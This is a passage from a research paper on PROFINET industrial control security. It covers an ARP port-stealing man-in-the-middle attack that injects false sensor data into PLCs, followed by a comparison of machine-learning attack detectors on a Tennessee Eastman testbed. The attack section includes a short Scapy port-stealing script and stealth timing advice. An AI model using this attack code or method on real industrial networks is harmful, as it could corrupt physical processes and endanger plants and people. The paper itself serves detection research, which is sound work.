Moreover, PROFINET inherits a variety of Information Technology protocols within its substructure to establish and maintain connectivity, and is therefore susceptible to cyber attack surfaces similar to those present in standard Ethernet environments. One of the main characteristics of the PROFINET protocol suite that distinguishes it from the other ICS protocols is that it prioritizes the type of communication based on real-time requirements. Consequently, as shown in Fig. 3, two channels are introduced, Real-Time (RT) and Non-Real-Time (NRT), and both channels coexist in the Application Relation (AR) between the IO Device and the IO Controller. An Application Relation is a state which both the IO Device and the IO Controller need to converge to in order to initialize the transmission of the cyclic data. However, a handshake is a prerequisite to this state, which is conducted by the Profinet Context-Manager (PN-CM).
FIGURE 3. PROFINET IO RT and the NRT stack (courtesy of profinetuniversity.com).
In terms of the C.I.A security aspects (confidentiality, integrity and availability) of the PROFINET protocol, it is shown in this work that, to compromise confidentiality of the cyclic data, through an Address Resolution Protocol (ARP)-compromising attack a hacker can read the data in plain text; to compromise integrity, the hacker can inject false data through the network switch; and to compromise availability, a port stealing attack would make the service temporarily unavailable.
B. PROFINET IO REAL-TIME PROTOCOL STRUCTURE
In order to guarantee real-time synchronicity in data transmission, certain layers of the OSI model have been omitted in PROFINET IO (PNIO), as illustrated in Fig. 3, which results in lower-overhead communication flows. Hence, as shown in Fig. 4, in the real-time structure the dissection of a frame only consists of the Ethernet header and the PROFINET application layer, which is specified as follows:
a) Frame-ID: Indicates the type of the frame, which is set to 0x8000 for cyclic real-time data.
b) IO Data: Sensor measurements and actuator signals are referred to as IO Data.
c) IO Data Status: Represents the status of a given variable in the frame.
d) Cycle Counter: An incremental value, incremented at the source, used for error checking.
e) Data Status: Indicates the validity of the entire packet.
FIGURE 4. PROFINET IO real-time packet structure.
In the IO module, the data cycle update time, which is denoted by dt, can be set based on the system requirements from 2 to 512 msec, and represents the rate of data exchange between the IO module and the PLC. In the developed testbed, given the slow behavior of the TE process, this value is set to dt = 512 msec, which implies that 4 data samples are communicated in each full cycle (2 seconds). Fig. 5 shows the cycle counter corresponding to dt = 512 msec.
FIGURE 5. Cycle counters corresponding to dt = 512 msec.
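To make the frame fields a)-e) concrete, the sketch below parses a raw Ethernet frame along the lines of the commonly documented PROFINET RT class 1 layout: EtherType 0x8892, a 2-byte Frame-ID, the cyclic IO data, and a trailer of cycle counter (2 bytes), data status (1 byte) and transfer status (1 byte). The offsets are assumptions based on that public description, the example bytes are fabricated, and this is an illustration of the structure rather than a complete dissector.

# Sketch of the cyclic RT frame layout described above (assumed: untagged
# frame, PROFINET EtherType 0x8892, Frame-ID 0x8000, 4-byte trailer).
import struct

def parse_pnio_rt(frame: bytes):
    dst, src = frame[0:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x8892:
        raise ValueError("not a PROFINET frame")
    frame_id = struct.unpack("!H", frame[14:16])[0]
    io_data = frame[16:-4]                      # IO data plus per-object status
    cycle_counter, data_status, transfer_status = struct.unpack("!HBB", frame[-4:])
    return {"frame_id": hex(frame_id), "io_data": io_data.hex(),
            "cycle_counter": cycle_counter, "data_status": hex(data_status),
            "transfer_status": transfer_status}

# fabricated example: 2 bytes of IO data (0x12 0x34) followed by a status byte
example = (bytes.fromhex("010203040506") + bytes.fromhex("0a0b0c0d0e0f") +
           struct.pack("!H", 0x8892) + struct.pack("!H", 0x8000) +
           bytes.fromhex("123480") + struct.pack("!HBB", 4096, 0x35, 0x00))
print(parse_pnio_rt(example))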
IV. CYBER ATTACK INJECTION
In this section, our methodology for injecting cyber attacks on the developed testbed is presented. Generally, different protocols enable various attack surfaces such as the Data Integrity (DI) attack (e.g. manipulating sensor measurements), and Denial-of-Service (DoS), which causes disruption of the communication flow among entities. In an ICS architecture, cyber attacks can be categorized into two general types, namely configuration and operational attacks. In the configuration attack, the malicious hacker targets the configuration protocols of the ICS, and consequently gains full control of the system. On the other hand, in the operational attacks, the malicious hacker mainly targets the operational communication protocol, such as the PROFINET IO real-time data, in which critical field data are transferred. For this cyber attack to take place, it is assumed that:
(i) The hacker has field-level access to the IO Module and PLCs.
(ii) The hacker has knowledge of the physical system, implying that he/she is aware of what is being transmitted from the sensors and what is being transferred to the actuators.
In [34], the authors exploit a vulnerability of the PROFINET Discovery and Basic Configuration Protocol (DCP) to inject DoS attacks through port stealing, against the application relation between the IO Controller and the IO Device. This type of cyber attack is not designed to be stealthy and has a higher probability of detection. An early attempt at false data injection through port stealing is presented in [35], although the developed attacks are not implemented on a real testbed. In this paper, based on the structure and features of PROFINET, a false data attack is injected into the PROFINET IO real-time data through the man-in-the-middle (MITM) structure and is validated on the developed testbed. This is mainly achieved by utilizing ARP, in which the port of the victim on the shared medium (such as a switch) is stolen and the hacker acts as a Man-in-the-Middle (MITM) in the closed-loop system that can modify the sensor measurements that are sent to the PLC.
The PROFINET IO devices do not have any endpoint security functionality [36], which makes cyber attacks feasible once a malicious hacker has physical access to a device or its network connections. One of the most effective and damaging cyber attacks on the PROFINET IO devices is the MITM cyber attack.
The MITM cyber attack is implemented in our developed testbed by utilizing the Port Stealing methodology. In the Port Stealing attack, the switch MAC table is compromised such that the hacker's MAC address is registered in place of the victim's. Therefore, the intended port from the I/O module is stolen by the hacker, who can consequently transmit false data to the PLCs.
Port Stealing is an active cyber attack which allows a hacker to sniff packets in a switched network as well as modify packets by injecting new packets. This cyber attack targets the Application Relationship between the IO Controllers and the IO devices. Successful Port Stealing requires the hacker to synchronize with the real-time data communication and establish a race condition. The complete Port Stealing strategy is developed as follows:
ARP Flooding: First, an ARP packet is constructed by setting the packet destination and source MAC address to the hacker MAC and the victim MAC, respectively. Subsequently, by injecting high flow rates of ARP packets into the switch, the intended victim's port is stolen. As shown in Figs. 6 and 7, the MAC table of the switch is modified after the ARP flooding and the MAC address of the hacker is set as the MAC address of the IO module in the MAC address table.
Receiving Data: In this step, the hacker receives data from the victim and modifies the sensor readings according to his/her knowledge of the process.
The data received by the hacker is the raw IO data from the PROFINET IO real-time packet as depicted in Fig. 4.
FIGURE 6. Data exchange configuration before the ARP flooding.
FIGURE 7. Data exchange configuration after the ARP flooding.
Next, the hacker needs to map the raw IO data into an actual sensor reading in order to be able to modify it precisely, so that it will result in the desired effect on the system. Here the assumption is that the hacker has knowledge of the physical process and the control system, and therefore can map the raw IO data to the actual sensor readings. Therefore, the hacker will be able to choose values that are not easily detectable by the operator, and thus a stealth cyber attack will be realized and accomplished.
Forwarding the Manipulated Data: In this step, the main MITM cyber attack is implemented, whereby the hacker re-crafts the received frames and forwards the modified frames back to the victim. However, the received frames cannot simply be forwarded back to the network, due to the existence of the cycle counter in the frame. There exists a threshold for the number of missing packets per cycle and its value can be set inside the TIA Portal tool. Therefore, in order to overcome this issue, the re-crafted packets are sent in a full cycle. Moreover, as the hacker and the IO modules are simultaneously sending data to the PLC, a race condition is established between them, in which the behavior of the system depends on the sequence or timing of events. With respect to Fig. 5, the race condition occurs if the hacker can send false data between the state transitions, so that the false data crafted by the hacker arrives at the victim before the actual data. The significance of winning the race condition is that the hacker becomes capable of injecting false measurement data into the system. However, this injection has to be sustained, ideally at every, or practically at most, state transitions, for the hacker to be successful in winning the race condition. After winning the race condition, the hacker can receive the RTC1 frames which contain the IO Data variables (process data). In order to increase the success probability of the cyber attack, the PLC should continually receive the mal-crafted data rather than the original data; therefore, the hacker should send each mal-crafted data item for more than one cycle.
Fig. 8 depicts the entire process of implementing the false data injection cyber attack on PROFINET. It should be noted that, due to the precise timing and synchronicity required in order to inject data into the PLC, we have used the C language and the libpcap library in order to make this methodology possible. The libpcap library works by capturing all the frames that are coming out of the physical medium into the data link layer. The alternative to using the libpcap library is to use packet capture software such as Wireshark; however, for our purposes this is not suitable since Wireshark captures and saves packets offline.
FIGURE 8. False Data Injection (FDI) through the port stealing.
One important point regarding the implemented cyber attack is that if the hacker continues the port stealing for a long duration, this will disrupt the communication between the PLC and the IO. In this case, the attack becomes a Denial-of-Service (DoS) attack, which can be easier for operators to detect. By stopping the port stealing step after a given time duration, such as 1 sec, the attacker is able to start the frame manipulation without disrupting the communication.
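For intuition only, the sketch below shows the port-stealing step of this strategy with Scapy. The authors implemented the full attack in C with libpcap because of the timing needed to win the race condition, so this Python version illustrates the mechanism rather than reproducing their tool; the MAC addresses and interface name are placeholders, and such code should only ever be run inside an isolated lab network.

# Illustrative port-stealing sketch (assumptions: placeholder MACs/interface;
# the authors' actual tool is written in C on top of libpcap).
from scapy.all import Ether, ARP, sendp

HACKER_MAC = "aa:bb:cc:dd:ee:01"     # placeholder
VICTIM_MAC = "aa:bb:cc:dd:ee:02"     # placeholder: the IO module's MAC
IFACE      = "eth0"                  # placeholder

def steal_port(count=500):
    # Frames whose SOURCE address is the victim's MAC and whose destination
    # is the hacker re-train the switch CAM table, so the victim's MAC ends
    # up mapped to the hacker's port (compare Figs. 6 and 7).
    frame = Ether(src=VICTIM_MAC, dst=HACKER_MAC) / ARP(op="who-has", hwsrc=VICTIM_MAC)
    sendp(frame, iface=IFACE, count=count, inter=0.001, verbose=False)

if __name__ == "__main__":
    steal_port()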
V. CYBER ATTACK DETECTION (CAD) SCHEME
In order to detect cyber attacks in our developed testbed, several machine learning-based detection strategies are proposed and implemented. As shown in Fig. 9, the cyber detection scheme is divided into three main steps, namely, (a) pre-processing, (b) main scheme, and (c) post-processing.
FIGURE 9. The proposed data-driven cyber attack detection methodology, where r(t) denotes the decision flag corresponding to the real-time data point x(t).
A. PRE-PROCESSING
In order to have a dataset with zero mean and unit variance (standardization), data normalization is performed. The key feature of data normalization is that it boosts the learning speed and optimizes the algorithm accordingly. Moreover, there are several available techniques for data normalization, based on the nature and requirements of the algorithm itself.
B. MAIN SCHEMES
Broadly speaking, anomaly detection schemes can be divided into five main categories, namely (1) linear, (2) proximity-based, (3) probabilistic, (4) outlier ensembles, and (5) neural networks [7]. Consequently, in order to provide a comprehensive comparative study and evaluation, the following schemes, belonging to different categories, are chosen:
Linear: Principal Component Analysis (PCA) and One-Class Support Vector Machines (OCSVM).
Proximity-Based: Local Outlier Factor (LOF) and k-Nearest-Neighbors (kNN).
Outlier Ensembles: Isolation Forest (IF).
1) PRINCIPAL COMPONENT ANALYSIS (PCA)
Principal Component Analysis (PCA) [37] is a method widely used to determine dominant subspaces in datasets based on the eigenvectors of the covariance matrix, which are designated as the principal components. An anomaly detection technique can be developed based on variations from the nominal dominant subspaces in the dataset. Generally, the use of major components indicates global deviations from the majority of results, whereas the use of minor components may suggest smaller local deviations. Indeed, as illustrated in Algorithm 1, by performing the Singular Value Decomposition (SVD) over the normalized data, the eigenvalues and eigenvectors can be determined. Moreover, by computing the PCA-reconstructed representation from X_hat = X T T^T, the approximated value (X_hat) can be obtained. Therefore, by computing the maximum Euclidean distance between the normalized training data and the approximated one in the training set, threshold values can be determined. Consequently, for the testing data point (D), if the distance between the existing instance and the corresponding approximated value of that instance is above a given threshold value, then the instance can be considered and classified as a cyber attack.
Algorithm 1 Principal Component Analysis (PCA)
Training:
Input: X - training data, p - number of components to keep for the PCA transformation.
Output: Threshold Tr
1: Calculate the SVD of the training data (X)
2: Construct the transformation matrix T by selecting the p dominant eigenvectors
3: Calculate the PCA-reconstructed representation, X_hat = X T T^T
4: Find the Euclidean distance between X_hat and X, E = distance(X_hat, X)
5: Set the threshold as Tr = max(E)
Testing:
Input: D - test data, Tr.
Output: Test data flag r
1: Calculate the PCA-reconstructed representation of the testing data, D_hat = D T T^T
2: Calculate the Euclidean distance between D_hat and D, e = distance(D_hat, D)
3: if e < Tr then
4:   D is normal, r = 0.
5: else
6:   D is abnormal, r = 1.
7: end
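A minimal numpy sketch of the detector of Algorithm 1 follows; it is not the authors' implementation, and the data used here are synthetic stand-ins for the normalized testbed measurements.

# Minimal PCA reconstruction-error detector mirroring Algorithm 1
# (assumption: synthetic data, p chosen arbitrarily).
import numpy as np

rng = np.random.default_rng(0)

def pca_train(X, p):
    _, _, Vt = np.linalg.svd(X, full_matrices=False)
    T = Vt[:p].T                                   # d x p transformation matrix
    E = np.linalg.norm(X - X @ T @ T.T, axis=1)    # training reconstruction errors
    return T, E.max()                              # threshold Tr = max(E)

def pca_test(D, T, Tr):
    e = np.linalg.norm(D - D @ T @ T.T)
    return 1 if e >= Tr else 0                     # r = 1 -> abnormal

X_train = rng.normal(size=(500, 25))               # stand-in for normalized healthy data
T, Tr = pca_train(X_train, p=5)
print(pca_test(rng.normal(size=25), T, Tr))        # likely 0 (healthy-like point)
print(pca_test(10 + rng.normal(size=25), T, Tr))   # likely 1 (strongly shifted point)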
2) ONE-CLASS SUPPORT VECTOR MACHINES (OCSVM)
In the one-class support vector machine, a semi-supervised anomaly detection approach, the aim is to determine a hypersphere in the feature space with the minimum radius that contains all or most of the data points corresponding to the healthy operation of the system [38]. The hypersphere has two main parameters, namely the radius R_T and its center a, which are obtained by solving an optimization problem as explained in Algorithm 2. Once these parameters are obtained through the training stage, for each test data point D one can obtain the distance between the data point and the hypersphere center a, and if this distance is greater than R_T, the point is classified as an anomaly; otherwise it is assigned as healthy data. The only two hyper-parameters for the OCSVM are C and gamma, where C controls the influence of the slack variables in the optimization process and can be obtained from C = 1/(nu N), where nu represents the trade-off between overfitting and the generalization accuracy, and gamma is the kernel coefficient.
Algorithm 2 One-Class Support Vector Machine (OCSVM) Algorithm
Training:
Input: x_i - training data (i in {1, 2, 3, ..., N}), C.
Output: The hypersphere centre a and its radius R_T.
Optimize alpha_i, i = 1, ..., N in
  min L(alpha) = \sum_{i,j=1}^{N} alpha_i alpha_j K(x_i, x_j) - \sum_{i=1}^{N} alpha_i K(x_i, x_i)
subject to 0 < alpha_i < C and \sum_{i=1}^{N} alpha_i = 1,
where K(x_i, x_j) = exp(-gamma ||x_i - x_j||^2).
Compute the centre (a) and the radius (R_T) of the hypersphere from:
  a = \sum_{i=1}^{N} alpha_i x_i
  R_T^2 = max_k [ K(x_k, x_k) - 2 \sum_{i=1}^{N} alpha_i K(x_k, x_i) + \sum_{i,j=1}^{N} alpha_i alpha_j K(x_i, x_j) ]
Testing:
Input: D - test data, the hypersphere centre a and its radius R_T.
Output: Test data flag r
Compute R(D) = K(D, D) - 2 \sum_{i=1}^{N} alpha_i K(D, x_i) + \sum_{i,j=1}^{N} alpha_i alpha_j K(x_i, x_j)
if R(D) > R_T then
  D is abnormal, r = 1.
else
  D is normal, r = 0.
end
3) k-NEAREST-NEIGHBORS (kNN)
The k-nearest-neighbor global unsupervised anomaly detection scheme is a simple way to determine irregularities, and is not to be mistaken for the kNN classification scheme [39]. As the name suggests, it specializes in global anomalies and is unable to identify local anomalies. In this approach, the hyper-parameter k denotes the number of nearest neighbors. During the training phase, the decision scores a_score corresponding to all the training points are computed as the largest distance to their k nearest neighbors [40] using the Ball-tree algorithm. The maximum value of a_score corresponding to the training data is set as the threshold Tr. Then, as illustrated in Algorithm 3, for each test data point D, the decision score a_score(D) is compared with the computed threshold to detect a cyber attack.
Algorithm 3 Nearest-Neighbor Algorithm
Training:
Input: x_i - training data (i in {1, 2, 3, ..., N}), k
Output: Threshold Tr
1: for i = 1, ..., N do
2:   Compute the k nearest neighbors of x_i using the Ball-tree algorithm.
3:   Compute the decision score a_score(x_i) as the largest distance between x_i and its nearest neighbors.
4: end
5: Set the threshold as Tr = max_i (a_score(x_i))
Testing:
Input: D - test data, x_i - training data, Tr
Output: Test data flag r
1: Compute the k nearest neighbors of D using the Ball-tree algorithm.
2: Compute the decision score a_score(D) as the largest distance between D and its nearest neighbors.
3: if a_score(D) > Tr then
4:   D is abnormal, r = 1.
5: else
6:   D is normal, r = 0.
7: end
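Since the paper trains its detectors with the Scikit-learn and PyOD libraries (Section VI-B), the sketch below shows one way the kNN detector of Algorithm 3 could be instantiated with PyOD's KNN model using the largest-distance score and a max-of-training-scores threshold. The hyper-parameter value and the synthetic data are assumptions; the authors' exact settings come from a mesh search around the PyOD defaults.

# kNN detector sketch in the spirit of Algorithm 3, built on PyOD
# (assumptions: n_neighbors=5, synthetic stand-in data).
import numpy as np
from pyod.models.knn import KNN

rng = np.random.default_rng(1)
X_train = rng.normal(size=(1000, 25))          # stand-in for normalized healthy data

det = KNN(n_neighbors=5, method="largest")     # score = largest distance to the k neighbors
det.fit(X_train)
Tr = det.decision_scores_.max()                # threshold as in Algorithm 3

def flag(x):
    score = det.decision_function(x.reshape(1, -1))[0]
    return 1 if score > Tr else 0              # 1 -> abnormal, 0 -> normal

print(flag(rng.normal(size=25)))               # likely 0
print(flag(8 + rng.normal(size=25)))           # likely 1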
4) LOCAL OUTLIER FACTOR (LOF)
The local outlier factor (LOF) approach [41] is the most well-known local anomaly detection algorithm. In this algorithm, the concept of local anomalies is utilized, where the LOF score is determined by comparing the Local Reachability Density (LRD) of the record with the LRDs of its k-nearest neighbors, as illustrated in Algorithm 4. In this approach, first, for the test data point D and the training set X, the k-distance D_k(D) is defined as D_k(D) = d(D, x), x in X, where (a) there exist at least k data points x' in X such that d(D, x') <= d(D, x), and (b) there exist at most k-1 data points x' in X such that d(D, x') < d(D, x), with d(D, x) denoting the distance between the points D and x, which can be computed using different norms. Next, the k-distance neighborhood N_k(D) is defined as follows:
  N_k(D) = { x in X | d(D, x) <= D_k(D) }.
It should be noted that the cardinality of N_k(D), denoted by |N_k(D)|, can in general be greater than k. Then, the reachability distance of D with respect to x in X is defined as
  R_k(D, x) = max{ d(D, x), D_k(x) }.
Algorithm 4 Local Outlier Factor (LOF) Algorithm
Input: x_i - training data, k, D - testing data
Output: Test data flag r
1: Find the k-distance neighborhood N_k(D)
2: Compute the Local Reachability Density (LRD):
   LRD(D) = |N_k(D)| / ( \sum_{x in N_k(D)} R_k(D, x) )
3: Compute LOF(D) = ( \sum_{x in N_k(D)} LRD(x) / LRD(D) ) / |N_k(D)|
4: if LOF(D) > threshold then
5:   D is abnormal, r = 1.
6: else
7:   D is normal, r = 0.
8: end
Next, the Local Reachability Density LRD(D) and the Local Outlier Factor LOF(D) are obtained as explained in Algorithm 4. Finally, the test data point is classified as abnormal if LOF(D) > 1.
5) ISOLATION FOREST (IF)
The Isolation Forest (IF) scheme, which is an unsupervised machine learning technique [42], [43], is now used as the strategy for performing the cyber attack detection objective. The key advantages of IF with respect to other anomaly detection schemes are as follows: (I) the IF scheme does not utilize any distance or density measure to detect an anomaly, which eliminates a major computational cost of distance computations, and (II) it has a linear time-complexity with a constant training time and a minimal memory requirement [44]. These are two key features that are essential for online implementation of the IF for a real-time cyber attack detection process in industrial control systems.
Cyber attack detection using the IF is performed in two stages, namely: (1) training, and (2) real-time testing. In the training phase, isolation trees are constructed by using sub-samples of the normal, healthy system operational dataset. In the online testing phase, the real-time data are fed to the trained IF for performing the cyber attack detection objective. In the training phase, given the training set X = {x_1, ..., x_N}, x_i in R^d, corresponding to the normal operation of the system, m different isolation trees T_i, i = 1, ..., m, are constructed by recursively splitting a sub-sample X_i of X until all the data points in X_i are isolated. For each isolation tree T_i, the sub-sample X_i is randomly selected without replacement from X using two hyper-parameters: n, the number of data points used to train each tree, and f <= d, the number of features that are selected for training that isolation tree, i.e. X_i = {x_{i,1}, ..., x_{i,n}}, x_{i,j} in R^f. Each tree is specified by a set of nodes that are indexed by the pair (j, k), where j denotes the depth of the node and k is the index of that node at the given depth, with 0 <= k <= 2^j - 1. Each internal node (j, k) has two children, (j+1, 2k) and (j+1, 2k+1), and the root node is denoted by (0, 0).
The isolation forest, as shown in Algorithm 5, operates based on the concept of binary recursive splitting of the feature space R^d by each isolation tree T_i, together with randomly selecting a split feature q in {1, ..., f} and its split value p within the selected feature range. The scheme is initiated with the root node (0, 0) and the training set X_i, and the training set for each node, denoted by X_i^{j,k}, is obtained recursively as follows. At the node (j, k), the data points are split into two subsets, X_i^{j+1,2k} = { x_{i,j} in X_i^{j,k}, j = 1, ..., n | x_{i,j}^q < p } and X_i^{j+1,2k+1} = { x_{i,j} in X_i^{j,k}, j = 1, ..., n | x_{i,j}^q >= p }, until all samples are isolated, where x_{i,j}^q corresponds to the q-th element of x_{i,j}. In each splitting step at node (j, k), two children nodes (j+1, 2k) and (j+1, 2k+1), with the corresponding training datasets X_i^{j+1,2k} and X_i^{j+1,2k+1}, are generated. These can be an internal node, if it is still possible to split the corresponding subset, or an external node, corresponding to the last node in the branch, when the size of the data subset of that region is 1 or the maximum tree depth is reached. In the case of an internal node, the data subsets X_i^{j+1,2k} and X_i^{j+1,2k+1} are further split until an external node is reached.
Algorithm 5 Train T_i(X_i)
Input: X_i - input data
Output: an isolation tree T_i
1: Initialization: The root node with index (0, 0) and the training set X_i^{0,0} = X_i. Set j = k = 0.
2: if X_i^{j,k} cannot be divided then
3:   The node (j, k) is designated as an external node and no division will be performed for this node.
4: else
5:   The node (j, k) is designated as an internal node
6:   Randomly select a feature q in {1, ..., f}
7:   Randomly select a splitting value p between the minimum and the maximum values of the feature q in X_i^{j,k}
8:   Set X_i^{j+1,2k} = { x_{i,j} in X_i^{j,k}, j = 1, ..., n | x_{i,j}^q < p }
9:   Set X_i^{j+1,2k+1} = { x_{i,j} in X_i^{j,k}, j = 1, ..., n | x_{i,j}^q >= p }
10:  Recursion: Go to step 2 and continue splitting the nodes (j+1, 2k) and (j+1, 2k+1)
11: end
The general concept for the cyber attack detection strategy utilizing the IF is justified and rationalized by the fact that, in the process of splitting the data, cyber attacks are different from the normal points and they can be isolated closer to the root of the tree. Consequently, they have a shorter path from the root.
C. POST-PROCESSING
As illustrated in Fig. 9, in the post-processing stage an observation window of the last $W$ data points is used to make the cyber attack detection decision. Specifically, if 80% (a value chosen based on the mesh search) of the $W$ flags $r(\cdot)$ over the interval $[t - W, t]$, i.e. those corresponding to the last $W$ data points, have been marked as anomalous by the anomaly detection scheme, then the current data point $x(t)$ is identified as a cyber attack. The main goal of the window-based post-processing scheme is to reduce the number of false alarms and to produce a smoother decision-making process.
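This windowed decision rule can be written in a few lines. The sketch below assumes a stream of per-sample flags r(t) in {0, 1} produced by any of the detectors above; the window length W and the 80% ratio are exposed as parameters, and the default W = 30 is a placeholder rather than a value taken from the paper.

```python
from collections import deque

def windowed_decision(flags, W=30, ratio=0.8):
    """Post-processed decision per time step: 1 only once the window is full and
    at least ratio*W of the last W per-sample flags are 1 (the rule of Section V-C)."""
    window = deque(maxlen=W)
    decisions = []
    for r in flags:                          # r is the raw flag of the current sample
        window.append(r)
        full = len(window) == W
        decisions.append(int(full and sum(window) >= ratio * W))
    return decisions

# Example: isolated alarms are suppressed, a sustained burst is kept.
print(windowed_decision([0, 1, 0, 0, 1, 1, 1, 1, 1, 1], W=5, ratio=0.8))
# -> [0, 0, 0, 0, 0, 0, 0, 1, 1, 1]
```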
VI. PERFORMANCE EVALUATION AND ASSESSMENT
In this section, the evaluation and validation of our proposed cyber attack detection schemes are provided and demonstrated for the developed TE testbed infrastructure.

A. DATASET
As previously indicated, the proposed methodologies of this work are demonstrated using real datasets generated from the implemented ICS testbed. The generated dataset consists of 25 variables, of which 16 correspond to sensor measurements and 9 correspond to actuator signals. Two types of datasets are generated. Initially, the testbed was run for almost 72 hours under normal (that is, cyber attack free) conditions to generate a training set of size (25 x 96827), after removing the initial transient behavior, i.e. $N = 96827$. Subsequently, the testbed was run several times subject to different cyber attack scenarios and different cyber attack gateways and points. Towards this end, false data injection (FDI) cyber attacks are injected into the communication channels between the I/O modules and the corresponding PLC by scaling the sensor measurement data online with a scaling factor $\alpha$. Four different scaling scenarios are considered, $\alpha \in \{0.98,\ 0.96,\ 0.94,\ 0.92\}$, each with a cyber attack duration of two hours. For instance, PLC 3 receives four measurements, namely $y_{12}$, $y_{14}$, $y_{15}$, and $y_{17}$, and a cyber attack on PLC 3 can be modeled as
$$y_i^{a} = \alpha\, y_i, \quad i = 12, 14, 15, 17, \qquad (5)$$
where $y_i^{a}$ corresponds to the $i$-th measurement under cyber attack. Figure 10 illustrates the FDI on $y_{12}$ and $y_{15}$ in PLC 3 for all four scaling scenarios. These four cyber attack scenarios are repeated for all five PLCs, and hence 20 different cyber attack scenarios are injected. Consequently, a test dataset of size (25 x 128159) has been generated, of which 68113 out of 128159 samples correspond to cyber attacks and the rest are healthy data. The sampling time for data logging was 2 seconds for both datasets.

FIGURE 10. Measurements under cyber attacks for PLC3.

B. TRAINING OF PROPOSED METHODOLOGIES
The training of the proposed schemes and structures is performed using an open-source machine learning library for the Python programming language, the Scikit-learn library, together with the PyOD toolbox [7], [45]. Furthermore, the training is performed using an 8-fold cross-validation, such that each structure is trained 8 times. Moreover, the hyper-parameters of each scheme are set based on a mesh search around the recommended values in PyOD [7].

C. PERFORMANCE EVALUATION METRICS
The confusion matrix is a form of contingency table with two dimensions, identified as True and Predicted, and a set of classes corresponding to both dimensions, as presented in Table 5. The following detection and classification performance metrics are derived from the confusion matrix [46]:

TABLE 5. The confusion matrix.

1) ACCURACY
Accuracy specifies the closeness of the measurements to a specific category/class and is computed as
$$\mathrm{Accuracy} = \frac{TP + TN}{TP + FP + TN + FN} \qquad (6)$$

2) RECALL
Recall is the True Positive Rate (TPR) and is computed as
$$TPR = \frac{TP}{TP + FN} \qquad (7)$$

3) PRECISION
Precision is the Positive Predictive Value (PPV) and is computed as
$$PPV = \frac{TP}{TP + FP} \qquad (8)$$

4) F1 SCORE
The F1 score is the harmonic average of precision and recall; it is at its best at a value of 1, implying perfect precision and recall, and is computed as
$$F1 = \frac{2 \cdot PPV \cdot TPR}{PPV + TPR} \qquad (9)$$

It should be noted that the main aim of this section is to perform a quantitative comparison of the various cyber attack detection schemes using the real-time data generated by the developed testbed.
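Given ground-truth labels and the post-processed decisions, the metrics of Eqs. (6)-(9) reduce to a few lines. The snippet below uses scikit-learn, which the paper already relies on, together with hypothetical label arrays.

```python
import numpy as np
from sklearn.metrics import confusion_matrix

y_true = np.array([0, 0, 1, 1, 1, 0, 1, 0])   # hypothetical ground truth (1 = attack)
y_pred = np.array([0, 0, 1, 1, 0, 0, 1, 1])   # hypothetical detector output after post-processing

tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
accuracy  = (tp + tn) / (tp + fp + tn + fn)                 # Eq. (6)
recall    = tp / (tp + fn)                                  # Eq. (7), TPR
precision = tp / (tp + fp)                                  # Eq. (8), PPV
f1        = 2 * precision * recall / (precision + recall)   # Eq. (9)
print(accuracy, recall, precision, f1)
```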
D. COMPARATIVE TESTING AND VALIDATION RESULTS
In this subsection, a quantitative comparison study of the various cyber attack detection schemes is presented. As previously indicated, the field data are collected in real time from the PLCs' local cloud. Therefore, by running the cyber attack detection schemes on the process data in real time, the status of the data can be determined online. Table 6 reports the efficiency of the proposed schemes. As illustrated in Table 6, the IF has the worst performance over the provided datasets, due to high oscillation in the detection signal (a high number of false negative alarms), while it has the fastest training time in comparison with the other techniques. Moreover, the OCSVM scheme has achieved quite promising results compared to the other methods. In general, the training speed is directly related to the characteristics of the scheme. For instance, the IF is based on a combination of multiple (binary) decision trees, which leads to a considerably fast training speed. On the other hand, the OCSVM scheme calculates decision boundaries around the data points, and hence its training speed is slow. Table 7 shows the cyber attack detection time (DT) corresponding to the various cyber attack scenarios. Overall, as expected from Table 6, the OCSVM and kNN have the fastest detection times, and with increasing cyber attack severity (i.e. smaller scaling factors) the detection times generally improve. However, for the IF algorithm, due to high oscillations in the original signal and the effects of the post-processing algorithm, the detection times do not improve as the severity increases.

TABLE 6. Performance of the proposed schemes.
TABLE 7. The cyber attack detection time (DT).
FIGURE 11. Cyber attack detection of the PLC3.

Figures 11 and 12 depict the performance of the various cyber attack detection schemes for the scenarios of PLC3 and PLC5, respectively, where the flag "0" represents healthy data and the flag "1" represents cyber attack data. The scaling factors in these figures are 0.98, 0.96, 0.94, and 0.92, respectively. It should be noted that PLC 5 is the least sensitive one in terms of cyber attack detection, due to the low number of direct measurements, as provided in Table 4. As shown in Figure 12, this fact leads to the generation of false negative alarms by the IF, while the other algorithms can still detect the attacks on PLC 5 without any false negative alarms.

FIGURE 12. Cyber attack detection of the PLC5.

E. THE COMPUTATIONAL COMPLEXITY
The computational complexity of machine learning algorithms can generally be analyzed through the O-notation of each algorithm, which represents the rate of growth or decline of the algorithm's computational cost. In the case of the nearest-neighbor based algorithms, the computational complexity of identifying the nearest neighbors is O(N^2) (where N is the number of samples), and the remaining computations, such as the density or LOF computations, can be ignored (less than 1% of the runtime). The complexity of the single-class SVM-based scheme is difficult to compute, since it depends on the number of support vectors and therefore on the data properties and the characteristics of the results. Furthermore, the tuning of the SVMs has a significant effect on the runtime, as the computations have quadratic complexity. Nevertheless, the complexity of the OCSVM scheme can be scaled between O(dN^2) and O(dN^3), where d denotes the number of features. The computational complexity of the PCA scheme is O(d^2 N + d^3), and it thus relies strongly on the number of measurements. If the number of dimensions is low, the scheme is in practice among the fastest algorithms in our study. Finally, the complexity of the IF scheme is O(tN log N), where t denotes the number of trees [42].

VII. DISCUSSION AND CONCLUSION
In this paper, a hybrid testbed is developed and implemented for an industrial control system (ICS) by simulating the Tennessee Eastman (TE) process in real time as the physical component of the testbed and implementing the other layers of the ICS using Siemens modules, such as PLCs and distributed I/O. Due to the various security constraints of ICS, there are many challenges in obtaining actual field data. Therefore, by generating and logging data from the physical part of the proposed testbed, a dataset as close as possible to real field data is generated. Accordingly, using this dataset, the impact of various real-time cyber attacks on the system and the corresponding proposed online detection approaches are studied. The Man-In-The-Middle (MITM) cyber attacks are directly implemented on the PROFINET communication protocol, such that a malicious actor can modify the sensor measurements that are sent to the PLC. Subsequently, several cyber attack detection approaches have been developed and implemented in real time. Table 6 shows the overall performance of each cyber attack detection methodology under the various malicious attack scenarios. Furthermore, Table 7 provides the cyber attack detection time for each scheme. Although all the evaluated schemes were able to detect the cyber attacks before a shutdown of the plant, the OCSVM scheme shows the best performance for this particular application. This study, based on the proposed testbed, can aid in determining the optimum approach for a particular ICS process given specified constraints (e.g. the plant shutdown condition) and requirements (e.g. the plant production rate). It should be emphasized that none of the previous works in the literature have 